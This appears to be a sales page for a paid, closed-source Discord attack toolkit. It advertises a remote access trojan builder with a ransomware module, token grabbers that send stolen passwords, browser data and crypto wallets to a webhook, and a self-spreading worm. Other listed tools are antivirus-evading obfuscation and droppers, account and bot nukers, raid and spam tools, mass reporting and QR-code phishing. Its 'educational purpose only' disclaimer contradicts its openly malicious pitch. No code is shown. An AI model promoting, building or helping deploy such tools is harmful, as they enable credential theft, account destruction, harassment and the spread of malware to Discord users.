Proof of concept on Discords API weaknesses

We call it the “Discord Weaponizer”, a Toolkit showing the many weak points of Discords API and allowing you to simultaneously test the security of other peoples devices
The Discord Weaponizer is the most advanced penetration testing / PoC Toolkit for Discord out there. While there are many people that tried to copy it, nobody has even come close to what our program can achieve and we say that with pride.

The Toolkit started as a singular stub-builder all the way back in Q1 2021. We quickly realized that this could become a massive project that we could work on for months on end, and we were right. Week after week we started working on new ideas for at least 4 to 5 months until we spotted our first copy-cat. Back then, this was fully open-source on Github. But because of said copy-cats & because of the fact that our tool now was way more powerful than anything else for Discord that was open-source, we decided to change that.

We went closed-source with this project and kept adding new features and bug fixes all the time. Some features are too powerful to be given out to everyone, so we quickly added a licensing system, but now have a look at what we actually have in store for you:

Now public in two available Versions

Lets compare some features:

Free for all

Malicious

A simple rat creator with only a few basic commands. For the full rat suite including ~70 commands and more you need Premium

Here’s a list of all Free commands:

https://cloud.cynthialabs.net/s/ZsJMgbr3AjMHJ62/preview

[Currently disabled and being rewritten to also bypass the new captchas without a 2Captcha Key]

A powerful Raid-Tool with proxy option. Load your tokens, proxies and raid on for hours. Spam a server or single people. Its your choice

Note: Yes, this decrypts the new Tokens saved with the 2022 Token encryption

Create a Token Grabber with obfuscation, small file-size and Icon to be spoofed as any application you want. Tricking a user was never simpler. Tokens will be sent via Webhook

Grabbed the Token of your worst enemy? Dont stop there, ruin it completely. The token nuker deletes all friends, leaves all servers and closes all messages before ultimately messing the settings up and even trying to lock it.

Huh.. why is that webhook being rate-limited? Probably because someone used our Webhook spammer. 

Proof of Concept

[IMPORTANT: JUST PROOF OF CONCEPT]

A nitro-gen trying random combinations to get you valid Nitro.

[IMPORTANT: JUST PROOF OF CONCEPT]

Same as Nitro-gen. Just with discord server invites. can be fun.

 

Self Options

Simple tool to login with a User-token. Just input the token and you’re in. We handle the other stuff

The Selfbot I have posted on my Forum, now also in my Toolkit. Spam users, send fun gifs, auto-farm dankmemer and more

Quick and easy way to see everything with just a token. Username, avatar link, nitro status, billing information etc.

Other Options

Hate someone but cant get their token? Fine, just mass report them. Get a message link, some throwaway tokens and spam report that guy. 100% ban garuantee

Yeah, a large Toolkit also comes with a few small settings. 

Toggle your RPC (Rich presence Client for discord to display the Toolkit as your current game)

Toggle Music bc… I dont even know why

Re-install & Update the Toolkithttps://cloud.cynthiaai.de/s/RJ45H4ReYRTCEwS/preview

Full Access (35$ Lifetime)

Malicious

Create your own RAT, controlled through Discord. Obfuscated with our custom-made “zalgo” obfuscation and with auto start-up, VM detection, and a Watchdog to guarantee it stays active.  Nearly 70 commands ranging from simple directory listing over up/download all the way to a ransomware module.

Check out all commands here:

https://cloud.cynthialabs.net/s/xjY6M92KfcKgoko/preview

Got a ton of clients? Want to use their computing power to give someone “connection problems”? No problem. Just use this CNC module for that

Note: Yes, this decrypts the new Tokens saved with the 2022 Token encryption

Get the maximum amount of Info from your Grabber. Geolocation, Discord Password, details from all browsers, crypto-wallets, backup keys, game-client sessions, and more! Using our own injection method that modifies the Discord client in multiple ways, you will always get every update.

The Token Grabber+ will of course be obfuscated and encrypted before you send it to the User to ensure it doesn’t alert any AV

Also, while the Standard token grabber only grabs from 4 Locations, this one grabs from pretty much every possible browser and even defeats a few common “Token Protectors”.

A new version of grabbing someone’s Token. Create a QR-Code that looks like a new option to accept a Nitro gift. If they scan it, you get access to their account.

Found a big fish? A bot developer? 

That’s what I made the Nuker+ for. Not only does this nuke the User account and lock it with a 100% guarantee, no it also nukes every single bot linked to that Account. It first tries to get all intents on the dev page (only fails if it’s a verified bot) and then nukes every guild the bot is in (ban all members, delete everything), and just because why not then also invalidates its own token.

Have fun

Build your very own Discord Worm. When a user runs it, it will execute your pre-defined payload and spread itself over Discord by automatically messaging all their friends a Download link for that exact worm. Stonks

Proof of Concept

[IMPORTANT: JUST PROOF OF CONCEPT]

This is a unique Idea. Brute-forcing someone’s Token. A discord Token is made of 3 parts, their account id, the creation date and a cryptographic value that’s not known. Having 2/3 of the token makes it easy to bruteforce it with enough time

Self Options

Getting nuked often? No worries. With our Account backup tool you can make a carbon-copy of your Account in mere seconds and roll it out to a new account in even less time whenever needed. Username, avatar, friends, servers, block-list… everything is getting backed up

Want to save a certain chat or just all 300 channels you have access to? Fine, go ahead. Nice HTML format with media files included.

Other Options

Need some proxies? Use our Tool.

Note: these arent a valid replacement for private paid proxies. These are just less-used proxies that are good enough for discord raids etc.

Who would’ve guessed. VT, Antiscan & co. dont like the original stubs. Ugh, fine. 

We now ship our Toolkit with the option to use obfuscation & Encryption to ensure your payload stays FUD. Works even better with the Dropper

Of course sending a massive 20+mb payload for your RAT or Token Grabber isn’t the easiest thing to do so we worked on a Dropper. Its ~5mb and with that can even be sent by spam-bots. Its also compatible with most binders to bind it to legitimate applications or whatever else your dark heart desires

Where can I get it?

IMPORTANT LEGAL DISCLAIMER:

This is for educational purpose only! Using this software to harm others i.e. destroy their machines, or steal their credentials is illegal!
We have reported illegal use of this tool to the respective authorities in the past and are not scared of doing so again.
While we aren't legally responsible for what you do with this, we are morally and we take that quite serious!

This purely exists to make Discord aware of how horrible their API is and how easy it is to abuse it.

In the event of Discord staff seeing this, please hit us up so we can talk about fixing this mess
You can download the Toolkit right here by pressing the left button. For premium, hit the right one.

The lower button will take you to our support server